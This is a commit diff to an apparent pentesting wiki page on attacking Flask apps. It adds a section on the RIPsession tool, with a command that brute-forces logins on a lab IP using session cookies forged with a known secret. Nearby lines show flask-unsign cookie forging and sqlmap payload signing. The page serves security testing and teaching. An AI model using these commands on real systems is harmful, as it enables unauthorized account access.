commit
e5cb7b75dc
@ -80,6 +80,15 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
|
|||||||
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
|
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### **RIPsession**
|
||||||
|
Command line tool to brute-force websites using cookies crafted with flask-unsign.
|
||||||
|
{% embed url="https://github.com/Tagvi/ripsession" %}
|
||||||
|
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
|
||||||
|
```
|
||||||
|
|
||||||
### SQLi in Flask session cookie with SQLmap
|
### SQLi in Flask session cookie with SQLmap
|
||||||
|
|
||||||
[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
|
[**This example**](../../pentesting-web/sql-injection/sqlmap/#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.
|
||||||
|
Loading…
Reference in New Issue
Block a user